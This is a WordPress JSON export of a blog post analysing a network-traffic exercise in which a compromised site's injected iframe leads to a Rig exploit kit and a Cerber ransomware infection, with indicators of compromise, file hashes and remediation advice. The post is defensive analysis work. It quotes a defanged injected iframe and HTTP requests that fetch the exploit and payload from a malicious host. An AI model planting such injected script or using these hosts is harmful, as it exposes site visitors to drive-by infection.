{"id":607,"date":"2016-11-14T15:28:07","date_gmt":"2016-11-14T15:28:07","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=607"},"modified":"2016-11-14T15:28:07","modified_gmt":"2016-11-14T15:28:07","slug":"malware-exercise-2016-10-15-crybaby-businessman","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=607","title":{"rendered":"Malware Exercise 2016-10-15 Crybaby businessman"},"content":{"rendered":"

So it has been a while since I have updated the blog. The joys of trying to study for the SANS GCIA while also working and trying to squeeze in some time for the family as well. So I thought that I would pick up on the latest exercise that Brad published (granted it was from last month). As usual, the artifacts found in this investigation can be found in my Github repo located here<\/a>. Once I have taken the test (and hopefully passed it), I can get back to writing more stuff and trying to figure out how the scripts work. But till then…<\/p>\n

About the Investigation
\n=======================
\n\u2013 Date and time range of the traffic you\u2019re reviewing.
\n> First packet: 2016-10-14 22:41:45 \/ Last packet: 2016-10-14 23:19:51 \/ Elapsed: 00:38:05<\/p>\n

\u2013 Date and time of infection.
\n> 2016-10-14 22:14:42<\/p>\n

\u2013 IP address, MAC address
\n> 10.14.106.192 \/ 00:05:31:c2:6f:b2 \/ <\/p>\n

\u2013 Description of the activity (what happened, if the host became infected, any details, etc.).
\n> From what I saw in the PCAP, the user went to a site that was compromised via a script injection. This site directed the user to another site which used a Flash exploit to install a malicious binary on the system. Once the binary was executed on the system, the user was then prompted with the “Cerber Decryptor” HTML page. The type of exploit kit (EK) used here was a Rig exploit kit leading to a Cerber infection.<\/p>\n

\u2013 A conclusion with recommendations for any follow-up actions.
\n> The system should be removed from the network and a backup of the user’s data should be made in case someone is able to reverse engineer the Cerber encryption so the files can be recovered. Once that has been done, a rekick of the system to make sure the infection is contained. I would also suggest blocking the IP addresses and\/or the domains associated with this infection to help reduce the attack service. I would also talk to the IT team to find out what patches are rolled out and how often they are rolled out to help prevent exploits being used against user’s systems. <\/p>\n

\u2013 Indicators of Compromise (IP, FQDN, etc\u2026)
\n===========================================
\n> 50.56.223.21 \/ unwrappedphotos.com
\n> 109.234.36.251 \/ rew.kaghaan.com
\n> 107.161.95.138 \/ ffoqr3ug7m726zou.le2brr.bid
\n> 148.251.6.214 \/ btc.blockr.io
\n> 173.254.231.111 \/ ffoqr3ug7m726zou.19jmfr.top
\n> 31.184.23x.x range (DST port: 6892)<\/p>\n

Hash Information of Artifacts
\n=============================
\nFile name: rew.kaghaan.com-flash.swf
\nSize: 49KB
\nMD5 hash: 9d8a1f948a043dd7ee7b64154986513e
\nVirustotal: http:\/\/virustotal.com\/en\/file\/b95fa5beddf64653bf88456ed521a0b7226d4fb4f5e8983b85ca5d03d8621be5\/analysis\/<\/a><\/p>\n

File name: flash-exploit-binary.exe
\nSize: 479KB
\nMD5 hash: 85f22cabd66f365a864b6e04cda85fa0
\nVirustotal: NA<\/p>\n

Notes From The Investigation
\n=============================
\nBased on the PCAP, the user went to Google and looked up the site called “unwrappedphotos.com.” Unfortunately, the site (known as the gate) had been compromised with an injected iframe script as shown below:<\/p>\n

 \r\n<[i]frame src="hxxp:\/\/rew.KAGHAAN.COM\/?xHiMdbKYJBrMDIQ=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY0Q" width="267" height="267"><\/iframe>\r\n<\/pre>\n
From here the client system does a GET request to the actual malicious site which then downloads a malicious Flash file which then downloads the encrypted malicious binary. <\/p>\n
\r\nGET \/?xHiMdbKYJBrMDIQ=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY0Q HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nReferer: http:\/\/unwrappedphotos.com\/\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: rew.kaghaan.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Fri, 14 Oct 2016 22:14:45 GMT\r\nContent-Type: text\/html; charset=UTF-8\r\nContent-Length: 18840\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\n\r\n.................68<\/pre>\n
\r\nGET \/index.php?xHiMdbKYJBrMDIQ=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY36TIHLOL-AFiXwE4UgfbbNlwsxaBWiTiJGQ23OWwGTF9merP_bo HTTP\/1.1\r\nAccept: *\/*\r\nReferer: http:\/\/rew.kaghaan.com\/?xHiMdbKYJBrMDIQ=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY0Q\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: rew.kaghaan.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Fri, 14 Oct 2016 22:14:46 GMT\r\nContent-Type: application\/x-shockwave-flash\r\nContent-Length: 50368\r\nConnection: keep-alive\r\n\r\nCWS\r\nn...x.\\...0...9....m..m..m..m..m<\/pre>\n
\r\nGET \/index.php?xHiMdbKYJBrMDIQ=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9wffY1wRq5TAF-M8jgnzmbJFJc4jw0DT72FZmOMaBF9G4xgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTFyn-3O9vw5 HTTP\/1.1\r\nConnection: Keep-Alive\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko\r\nHost: rew.kaghaan.com\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Fri, 14 Oct 2016 22:14:53 GMT\r\nContent-Type: application\/x-msdownload\r\nContent-Length: 490175\r\nConnection: keep-alive\r\nAccept-Ranges: bytes\r\n\r\n=|i~C\r\n........8..vY3..<\/pre>\n
Once the binary had been downloaded and executed, I then started seeing one of the classic signs of a Cerber infection – UDP traffic to a range of IP addresses (in this case 31.184.234.x – 31.184.235.x) to port 6892 as shown below:<\/p>\n
\"\"<\/a><\/p>\n
We can then see the calls to the site “ffoqr3ug7m726zou.le2brr.bid,” “btc.blockr.io,” and “ffoqr3ug7m726zou.19jmfr.top” which all relate to the creation of the Cerber Decryptor HTML page which is what alerted the user that his files were encrypted.<\/p>\n
\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
So it has been a while since I have updated the blog. The joys of trying to study for the SANS GCIA while also working and trying to squeeze in some time for the family as well. So I thought that I would pick up on the latest exercise that Brad published (granted it was from last month). As usual, the artifacts found in this investigation can be found in my Github repo located here. Once I have taken the test (and hopefully passed it), I can get back to writing more stuff and trying to figure out how the…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-607","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/607","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=607"}],"version-history":[{"count":3,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/607\/revisions"}],"predecessor-version":[{"id":612,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/607\/revisions\/612"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=607"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=607"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}